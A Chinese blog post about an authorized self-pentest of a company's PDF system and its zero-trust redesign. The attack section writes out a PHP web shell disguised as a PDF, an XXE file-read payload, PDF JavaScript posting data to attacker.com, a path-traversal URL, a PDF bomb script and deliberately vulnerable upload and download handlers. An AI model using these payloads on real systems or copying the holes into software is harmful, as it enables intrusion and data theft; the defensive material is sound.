我黑了自己公司的PDF系统：零信任时代的文档安全实战

免责声明

重要提醒：本文所有测试均在合法授权的环境下进行，目的是提升系统安全性。请勿将相关技术用于非法用途。

起因：一次"意外"的发现

上个月公司搞安全演练，让我们IT部门自查系统漏洞。我负责PDF文档处理系统这块，本来以为就是走个过场，结果一查不得了——发现了一堆让人头皮发麻的安全问题。

作为一个有责任心的程序员，我决定彻底"黑"一次自己的系统，看看到底有多少漏洞。结果让我彻夜难眠...

攻击面分析

PDF处理系统的攻击面比想象中要大得多：

PDF系统攻击向量

文件上传 ──┐
           │
文件解析 ──┼──→ PDF处理系统 ──→ 数据库存储
           │                    │
文件存储 ──┘                    └──→ 文件下载

每个环节都可能成为攻击入口。

实战渗透过程

漏洞1：恶意PDF上传绕过

第一个发现让我冷汗直冒。我们的系统只检查文件扩展名，完全没有验证文件内容：

// 原来的"安全"检查（错误示范）
@PostMapping("/upload")
public ResponseEntity<String> uploadPDF(@RequestParam("file") MultipartFile file) {
    String filename = file.getOriginalFilename();
    
    // 这种检查形同虚设
    if (!filename.toLowerCase().endsWith(".pdf")) {
        return ResponseEntity.badRequest().body("只允许PDF文件");
    }
    
    // 直接保存，没有内容验证
    storageService.save(file);
    return ResponseEntity.ok("上传成功");
}

我轻松构造了一个伪装的"PDF"：

# 创建恶意文件
echo "<?php system(\$_GET[cmd]); ?>" > shell.php
mv shell.php malicious.pdf

# 绕过检查，成功上传
curl -X POST -F "file=@malicious.pdf" http://company-pdf.com/upload

危害程度：严重

攻击者可以上传任意恶意文件，如果配合目录遍历漏洞，可能直接获取服务器权限。

漏洞2：PDF炸弹攻击

PDF格式支持嵌套和压缩，可以构造"炸弹"文件：

// 构造PDF炸弹的Python脚本
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter
import io
import zlib

def create_pdf_bomb():
    # 创建一个包含大量重复内容的PDF
    buffer = io.BytesIO()
    c = canvas.Canvas(buffer, pagesize=letter)
    
    # 创建10000页，每页包含大量文本
    for page in range(10000):
        c.drawString(100, 750, "A" * 1000 * page)  # 指数增长的内容
        c.showPage()
    
    c.save()
    
    # 多层压缩
    pdf_data = buffer.getvalue()
    compressed = zlib.compress(pdf_data, 9)
    
    return compressed

这个30KB的"PDF"解压后占用8GB内存，直接让服务器OOM重启。

漏洞3：XXE注入攻击

PDF可以包含XML结构，存在XXE（XML External Entity）注入风险：

<!-- 恶意PDF中的XXE Payload -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

通过这种方式，我成功读取了服务器上的敏感文件：

/etc/passwd - 系统用户信息
/proc/version - 系统版本信息
/var/log/application.log - 应用日志（可能包含密码）

漏洞4：JavaScript执行

很多人不知道PDF支持JavaScript，这为XSS攻击开了一扇门：

// PDF中的恶意JavaScript
this.submitForm({
    cURL: "http://attacker.com/steal",
    cSubmitAs: "XML",
    cCharSet: "utf-8"
});

// 或者更隐蔽的方式
app.launchURL("javascript:alert(document.cookie)");

漏洞5：路径遍历

文件下载接口存在路径遍历漏洞：

// 有漏洞的下载接口
@GetMapping("/download")
public ResponseEntity<Resource> downloadFile(@RequestParam String filename) {
    // 危险！没有路径验证
    Path filePath = Paths.get(UPLOAD_DIR + filename);
    Resource resource = new FileSystemResource(filePath.toFile());
    
    return ResponseEntity.ok(resource);
}

// 攻击payload
// http://company-pdf.com/download?filename=../../../etc/passwd

零信任安全架构

发现这么多漏洞后，我重新设计了基于零信任原则的PDF安全架构：

1. 文件上传安全

@Service
public class SecurePDFUploadService {
    
    private final VirusScanService virusScanner;
    private final FileTypeDetector typeDetector;
    
    public UploadResult secureUpload(MultipartFile file) {
        // 1. 文件大小限制
        if (file.getSize() > MAX_FILE_SIZE) {
            throw new SecurityException("文件过大");
        }
        
        // 2. 真实类型检测（基于文件头）
        String realType = typeDetector.detectType(file.getBytes());
        if (!"application/pdf".equals(realType)) {
            throw new SecurityException("非法文件类型");
        }
        
        // 3. 病毒扫描
        ScanResult scanResult = virusScanner.scan(file.getBytes());
        if (scanResult.isInfected()) {
            throw new SecurityException("文件包含恶意内容");
        }
        
        // 4. PDF结构验证
        validatePDFStructure(file.getBytes());
        
        // 5. 内容沙盒处理
        byte[] sanitizedContent = sanitizePDF(file.getBytes());
        
        // 6. 隔离存储
        String secureId = secureStorageService.store(sanitizedContent);
        
        return new UploadResult(secureId);
    }
    
    private void validatePDFStructure(byte[] content) {
        try (PDDocument doc = PDDocument.load(content)) {
            // 检查页面数量限制
            if (doc.getNumberOfPages() > MAX_PAGES) {
                throw new SecurityException("PDF页面数量超限");
            }
            
            // 检查嵌入JavaScript
            if (containsJavaScript(doc)) {
                throw new SecurityException("PDF包含JavaScript代码");
            }
            
            // 检查外部引用
            if (containsExternalReferences(doc)) {
                throw new SecurityException("PDF包含外部引用");
            }
            
        } catch (IOException e) {
            throw new SecurityException("PDF格式损坏");
        }
    }
}

2. 沙盒化处理

所有PDF处理都在隔离的沙盒环境中进行：

# Docker沙盒配置
FROM openjdk:11-jre-slim

# 创建非root用户
RUN adduser --disabled-password --gecos ' pdfuser

# 限制系统调用
RUN apt-get update && apt-get install -y seccomp-tools

# 资源限制
ENV JAVA_OPTS="-Xmx512m -XX:+UseContainerSupport -XX:MaxRAMPercentage=75"

# 网络隔离
USER pdfuser
WORKDIR /app

# 只读文件系统
VOLUME ["/tmp"]

3. 零信任网络

每个请求都要经过严格的身份验证和授权：

@Component
public class ZeroTrustFilter implements Filter {
    
    @Override
    public void doFilter(ServletRequest request, ServletResponse response, 
                        FilterChain chain) throws IOException, ServletException {
        
        HttpServletRequest httpRequest = (HttpServletRequest) request;
        
        // 1. 请求来源验证
        if (!isValidOrigin(httpRequest)) {
            reject(response, "Invalid origin");
            return;
        }
        
        // 2. 用户身份验证
        String token = extractToken(httpRequest);
        UserContext user = authService.validateToken(token);
        if (user == null) {
            reject(response, "Authentication failed");
            return;
        }
        
        // 3. 权限检查
        String resource = httpRequest.getRequestURI();
        if (!hasPermission(user, resource)) {
            reject(response, "Access denied");
            return;
        }
        
        // 4. 行为分析
        if (isSuspiciousBehavior(user, httpRequest)) {
            securityAudit.logSuspiciousActivity(user, httpRequest);
            reject(response, "Suspicious activity detected");
            return;
        }
        
        // 5. 设置安全上下文
        SecurityContextHolder.setContext(user);
        
        chain.doFilter(request, response);
    }
}

安全监控体系

建立了全方位的安全监控：

实时威胁检测

@Component
public class ThreatDetectionService {
    
    // 异常行为检测
    @EventListener
    public void detectAnomalies(PDFProcessEvent event) {
        // 检测文件大小异常
        if (event.getFileSize() > NORMAL_SIZE_THRESHOLD) {
            alertService.sendAlert("Large file detected", event);
        }
        
        // 检测处理时间异常
        if (event.getProcessingTime() > NORMAL_TIME_THRESHOLD) {
            alertService.sendAlert("Long processing time", event);
        }
        
        // 检测用户行为异常
        UserBehavior behavior = behaviorAnalyzer.analyze(event.getUserId());
        if (behavior.isAnomalous()) {
            alertService.sendAlert("Abnormal user behavior", event);
        }
    }
    
    // 恶意模式检测
    @Scheduled(fixedDelay = 60000)
    public void scanForMaliciousPatterns() {
        List<ProcessedFile> recentFiles = fileService.getRecentFiles(Duration.ofMinutes(5));
        
        for (ProcessedFile file : recentFiles) {
            MalwareSignature signature = malwareScanner.scan(file);
            if (signature.isMatched()) {
                quarantineService.quarantine(file);
                alertService.sendAlert("Malware detected", file);
            }
        }
    }
}

应急响应预案

安全事件响应流程

检测：自动化监控系统发现异常
隔离：立即隔离受影响的系统和文件
分析：分析攻击向量和影响范围
修复：修复漏洞，清除恶意内容
恢复：恢复正常服务
总结：总结经验，完善防护措施

防护效果

实施新的安全架构后，效果显著：

安全指标	改进前	改进后
恶意文件拦截率	0%	99.7%
安全事件响应时间	数小时	<5分钟
误报率	-	<0.1%

经验教训

这次"自黑"行动让我深刻认识到：

安全不是事后补救，而是设计阶段就要考虑的
永远不要相信用户输入，包括文件内容
纵深防御比单点防护更有效
自动化监控是发现威胁的关键
定期渗透测试是必要的

开源安全工具推荐

分享一些我在加固过程中用到的优秀工具：

安全工具箱

ClamAV：开源病毒扫描引擎
YARA：恶意软件识别规则引擎
ModSecurity：Web应用防火墙
Fail2ban：入侵检测和预防
OWASP ZAP：Web应用安全扫描
Nmap：网络探测和安全审计

写在最后

安全是一个永无止境的过程。黑客的攻击手段在不断进化，我们的防护措施也要持续改进。这次经历让我明白，有时候最大的敌人就是自己的疏忽大意。

希望我的经验能给大家一些启发。记住，在安全面前，永远保持谦逊和警觉。

再次提醒：本文涉及的技术仅用于安全研究和防护，请勿用于非法用途。网络安全，人人有责。

相关的安全加固脚本和检测工具我已经整理在GitHub上，欢迎大家交流讨论。让我们一起构建更安全的网络环境！